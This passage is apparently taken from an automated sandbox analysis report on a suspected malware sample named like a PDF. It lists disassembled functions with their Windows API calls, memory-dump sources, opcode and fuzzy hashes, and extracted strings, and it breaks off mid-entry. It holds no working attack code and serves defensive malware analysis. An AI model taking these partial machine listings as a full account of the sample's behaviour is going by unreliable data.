                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00B44DA5
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00B44DAC
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                          • String ID:
                                                                          • API String ID: 3824534824-0
                                                                          • Opcode ID: d1df664ec6a9f0fe3aaa2722c34c584d970eddd3505b5a4d1d5d1b23e0a67e81
                                                                          • Instruction ID: e27f1f5b792eea81f23f97dadcbbc2556c71c19cd2be221b9219f857bf0691a7
                                                                          • Opcode Fuzzy Hash: d1df664ec6a9f0fe3aaa2722c34c584d970eddd3505b5a4d1d5d1b23e0a67e81
                                                                          • Instruction Fuzzy Hash: 521108B2D04245BBC7119FA8EC04BAB7FECEB46320F1442B9F914D3291DBB58D1087A0
                                                                          APIs
                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B38766
                                                                          • GetLastError.KERNEL32(?,00B3822A,?,?,?), ref: 00B38770
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00B3822A,?,?,?), ref: 00B3877F
                                                                          • HeapAlloc.KERNEL32(00000000,?,00B3822A,?,?,?), ref: 00B38786
                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B3879D
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 842720411-0
                                                                          • Opcode ID: 5d0e6bd4494906c63e6dd9779e41df2380384ad8e0eedc1c04933d706b98d2e4
                                                                          • Instruction ID: 93ef8699e65a717b676c4bfcc437ab95ff550f8e9eb576fbf32cbab62bda8b1f
                                                                          • Opcode Fuzzy Hash: 5d0e6bd4494906c63e6dd9779e41df2380384ad8e0eedc1c04933d706b98d2e4
                                                                          • Instruction Fuzzy Hash: CC014F71600205EFDB104FA5EC48D677BADFF86395B200469F949C3260DE758C10CA60
                                                                          APIs
                                                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B45502
                                                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B45510
                                                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B45518
                                                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00B45522
                                                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B4555E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                          • String ID:
                                                                          • API String ID: 2833360925-0
                                                                          • Opcode ID: 4389b844d0347753cf5e079553695ea9eb01f8a7c2b99ace8590d6e90e07f61d
                                                                          • Instruction ID: 7de786e574efed333247297c9a5b81ecba3262e016c2898c56e4a613db46309c
                                                                          • Opcode Fuzzy Hash: 4389b844d0347753cf5e079553695ea9eb01f8a7c2b99ace8590d6e90e07f61d
                                                                          • Instruction Fuzzy Hash: 91010936D00A1EDBCF109BE8E888AFDBBB9FB19711F400096E905B2151DB745654DBA1
                                                                          APIs
                                                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?,?,?,00B3799D), ref: 00B3766F
                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?,?), ref: 00B3768A
                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?,?), ref: 00B37698
                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?), ref: 00B376A8
                                                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00B3758C,80070057,?,?), ref: 00B376B4
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                          • String ID:
                                                                          • API String ID: 3897988419-0
                                                                          • Opcode ID: a50a525222cfb2857c32c71201424e425fb65fcd8ba9538b2e0b534798071ce9
                                                                          • Instruction ID: 7c3cc9905375e8db397964e4806cea9867d0115d9a945e3b472ff736fc324252
                                                                          • Opcode Fuzzy Hash: a50a525222cfb2857c32c71201424e425fb65fcd8ba9538b2e0b534798071ce9
                                                                          • Instruction Fuzzy Hash: 5301B1B2604605BBDB208F99EC45AAA7BECEB44751F2040A8FD04D3211EF75DD0087A0
                                                                          APIs
                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B38608
                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B38612
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B38621
                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B38628
                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B3863E
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: bcd8dc414f8079873e8c81cd30f8015ea36db8788162472c7c4063b395e2c1aa
                                                                          • Instruction ID: 944597a9d90be6f922da197278c37633567ca48de5a2fa01e5f5a3f3386a7238
                                                                          • Opcode Fuzzy Hash: bcd8dc414f8079873e8c81cd30f8015ea36db8788162472c7c4063b395e2c1aa
                                                                          • Instruction Fuzzy Hash: 50F04931241305AFEB100FA5EC8AE7B3BACEF8A794F100469FA49D7190CFA59C41DA61
                                                                          APIs
                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B38669
                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B38673
                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B38682
                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B38689
                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B3869F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                          • String ID:
                                                                          • API String ID: 44706859-0
                                                                          • Opcode ID: 46d52ff915d62103fe86bb4d80a5300352aa4e00e586a1dc43ad1b73c1159fd5
                                                                          • Instruction ID: fe0662423256520705804e57f0e8d30e6af9a68b99a55758700e5eaca07566b3
                                                                          • Opcode Fuzzy Hash: 46d52ff915d62103fe86bb4d80a5300352aa4e00e586a1dc43ad1b73c1159fd5
                                                                          • Instruction Fuzzy Hash: 54F04FB1200305AFEB111FA5EC89E773BACEF8A754F200065F945D7190CEA9D941DA61
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00B3C6BA
                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B3C6D1
                                                                          • MessageBeep.USER32(00000000), ref: 00B3C6E9
                                                                          • KillTimer.USER32(?,0000040A), ref: 00B3C705
                                                                          • EndDialog.USER32(?,00000001), ref: 00B3C71F
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 3741023627-0
                                                                          • Opcode ID: 770482a12882d8a54e2bdda421fbf91ffe9a7cdb82f215e11f41b0de9cca8187
                                                                          • Instruction ID: f036a800a66dac23d333ff3df05a24c539d141ea4f0b9b0e607cfd11d7cec952
                                                                          • Opcode Fuzzy Hash: 770482a12882d8a54e2bdda421fbf91ffe9a7cdb82f215e11f41b0de9cca8187
                                                                          • Instruction Fuzzy Hash: 8D014F30500705ABEB21AB64ED8EBA67BB8FB00745F1006A9F542A24E1DBE5AD54CF90
                                                                          APIs
                                                                          • EndPath.GDI32(?), ref: 00AE13BF
                                                                          • StrokeAndFillPath.GDI32(?,?,00B1BAD8,00000000,?), ref: 00AE13DB
                                                                          • SelectObject.GDI32(?,00000000), ref: 00AE13EE
                                                                          • DeleteObject.GDI32 ref: 00AE1401
                                                                          • StrokePath.GDI32(?), ref: 00AE141C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                          • String ID:
                                                                          • API String ID: 2625713937-0
                                                                          • Opcode ID: 3811e276d042b2e6a93f0eab4b10873850ee937fce218d860687b28765043c03
                                                                          • Instruction ID: c247d33ce331849defb4b50e7e2715744c18dbcc165954448e9dd4ddc82bd3b7
                                                                          • Opcode Fuzzy Hash: 3811e276d042b2e6a93f0eab4b10873850ee937fce218d860687b28765043c03
                                                                          • Instruction Fuzzy Hash: 4DF0FFB4004349EBDB155F26EC0D7683FA9A712726F08C226F4298A1F1CF794995DF51
                                                                          APIs
                                                                          • CoInitialize.OLE32(00000000), ref: 00B4C69D
                                                                          • CoCreateInstance.OLE32(00B72D6C,00000000,00000001,00B72BDC,?), ref: 00B4C6B5
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                          • CoUninitialize.OLE32 ref: 00B4C922
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                          • String ID: .lnk
                                                                          • API String ID: 2683427295-24824748
                                                                          • Opcode ID: e903d99285bcb68e4232581a86fee3b0c74f3d70b4517f71832207c6edab0195
                                                                          • Instruction ID: 1463151c15a2d2e4ed3ad9989889e6f940f22dc6883d9466e5e532f0c27e5ff5
                                                                          • Opcode Fuzzy Hash: e903d99285bcb68e4232581a86fee3b0c74f3d70b4517f71832207c6edab0195
                                                                          • Instruction Fuzzy Hash: 3DA13DB1108345AFD700EF65C991EAFB7E8EF94744F00496CF1569B1A2EB70EA09CB52
                                                                          APIs
                                                                            • Part of subcall function 00B00FF6: std::exception::exception.LIBCMT ref: 00B0102C
                                                                            • Part of subcall function 00B00FF6: __CxxThrowException@8.LIBCMT ref: 00B01041
                                                                            • Part of subcall function 00AE7F41: _memmove.LIBCMT ref: 00AE7F82
                                                                            • Part of subcall function 00AE7BB1: _memmove.LIBCMT ref: 00AE7C0B
                                                                          • __swprintf.LIBCMT ref: 00AF302D
                                                                          Strings
                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00AF2EC6
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                          • API String ID: 1943609520-557222456
                                                                          • Opcode ID: 6a58fdcb3e53e29f798f4feb5a108b375378595ee822823e72185abc0449c77e
                                                                          • Instruction ID: 9ad0a96ad3f96fe8ea8b05c7dbfcb93cacc06d2eb795829139ef23f65868edb0
                                                                          • Opcode Fuzzy Hash: 6a58fdcb3e53e29f798f4feb5a108b375378595ee822823e72185abc0449c77e
                                                                          • Instruction Fuzzy Hash: 8F918D325083559FCB18EF64DA85C7EB7E4EF85740F00495EF9869B2A1EA20EE44CB52
                                                                          APIs
                                                                            • Part of subcall function 00AE48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AE48A1,?,?,00AE37C0,?), ref: 00AE48CE
                                                                          • CoInitialize.OLE32(00000000), ref: 00B4BC26
                                                                          • CoCreateInstance.OLE32(00B72D6C,00000000,00000001,00B72BDC,?), ref: 00B4BC3F
                                                                          • CoUninitialize.OLE32 ref: 00B4BC5C
                                                                            • Part of subcall function 00AE9997: __itow.LIBCMT ref: 00AE99C2
                                                                            • Part of subcall function 00AE9997: __swprintf.LIBCMT ref: 00AE9A0C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                          • String ID: .lnk
                                                                          • API String ID: 2126378814-24824748
                                                                          • Opcode ID: 7bb6ccc64516333738bc3caf8d5f506e2432236f45fb02a01ac7663abb6dfe7b
                                                                          • Instruction ID: f6357d2599319e39d0cc36befe0f5fc9026bd5a86ee31a4752455230402513fc
                                                                          • Opcode Fuzzy Hash: 7bb6ccc64516333738bc3caf8d5f506e2432236f45fb02a01ac7663abb6dfe7b
                                                                          • Instruction Fuzzy Hash: A4A154756043419FCB00DF25C584E6ABBE5FF88314F148998F99A9B3A2CB31EE45CB91
                                                                          APIs
                                                                          • __startOneArgErrorHandling.LIBCMT ref: 00B052DD
                                                                            • Part of subcall function 00B10340: __87except.LIBCMT ref: 00B1037B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorHandling__87except__start
                                                                          • String ID: pow
                                                                          • API String ID: 2905807303-2276729525
                                                                          • Opcode ID: ebf5dee7f7a5d27c6ac60a8430355a4c6073794e1134fa6f854dc745e1f9ead2
                                                                          • Instruction ID: c3f0686ad4dde34c881bf8281b47e2eb12191facd80092f98a037301ef603311
                                                                          • Opcode Fuzzy Hash: ebf5dee7f7a5d27c6ac60a8430355a4c6073794e1134fa6f854dc745e1f9ead2
                                                                          • Instruction Fuzzy Hash: 8E513B21A2D60187D7317724D9813BF2FE4DF00750FA049D8E09A866E5EEB48CD49E4A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID: #$+
                                                                          • API String ID: 0-2552117581
                                                                          • Opcode ID: 43a8e6954e139e522e74beacaf0189725226d10e3f21262a9506228d70dddb39
                                                                          • Instruction ID: 5d4e9c75761b9263e1a667f68873513168546bccd020d622f4acf610b4574abf
                                                                          • Opcode Fuzzy Hash: 43a8e6954e139e522e74beacaf0189725226d10e3f21262a9506228d70dddb39
                                                                          • Instruction Fuzzy Hash: FA5101755046469FDF26AF29D888AFE7BE4FF19310F2440A5EC919B2E0DB349D42CB60
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: _memset$_memmove
                                                                          • String ID: ERCP
                                                                          • API String ID: 2532777613-1384759551
                                                                          • Opcode ID: 9cff7d90b3edefcbedddc6009d94ec0d46b6d91dc42e5744e8a00d128476c3ac
                                                                          • Instruction ID: ae2c22e81e36854755efee6a740aacf2128a7987e1b0caddfa66bc9b6f4f8740
                                                                          • Opcode Fuzzy Hash: 9cff7d90b3edefcbedddc6009d94ec0d46b6d91dc42e5744e8a00d128476c3ac
                                                                          • Instruction Fuzzy Hash: 6551A5719007099BDB24DF95C981BEABBF8EF04715F2085AEEA4ADB241E771D584CB40
                                                                          APIs
                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B6F910,00000000,?,?,?,?), ref: 00B67C4E
                                                                          • GetWindowLongW.USER32 ref: 00B67C6B
                                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B67C7B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: Window$Long
                                                                          • String ID: SysTreeView32
                                                                          • API String ID: 847901565-1698111956
                                                                          • Opcode ID: a01bf71fd0abf4bc1594198557fb3b02c0bff71912bf1dce3ac4e0bb623b08cd
                                                                          • Instruction ID: 02ff54d31defc5d78dca0117606a7c2d10764faa0dd34c855dd8c8e06ad24695
                                                                          • Opcode Fuzzy Hash: a01bf71fd0abf4bc1594198557fb3b02c0bff71912bf1dce3ac4e0bb623b08cd
                                                                          • Instruction Fuzzy Hash: B3319C31244206ABDB118F38DC45BEA77E9EB49328F244765F875A32E0DB39EC919B50
                                                                          APIs
                                                                          • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00B676D0
                                                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00B676E4
                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B67708
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1751845966.0000000000AE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AE0000, based on PE: true
                                                                          • Associated: 00000000.00000002.1751833036.0000000000AE0000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B6F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751901747.0000000000B95000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751942917.0000000000B9F000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1751958975.0000000000BA8000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_ae0000_SC_TR11670000_pdf.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Window
                                                                          • String ID: SysMonthCal32
                                                                          • API String ID: 2326795674-1439706946
                                                                          • Opcode ID: dd135e73f5253f3dd1dd28d1a4e2db2101d518efb61590fe558f65311d0d96eb
                                                                          • Instruction ID: e4dfebb0af720eae67136ba89d7507b5796bacfcf47b5b71079701f95d9cf0ba
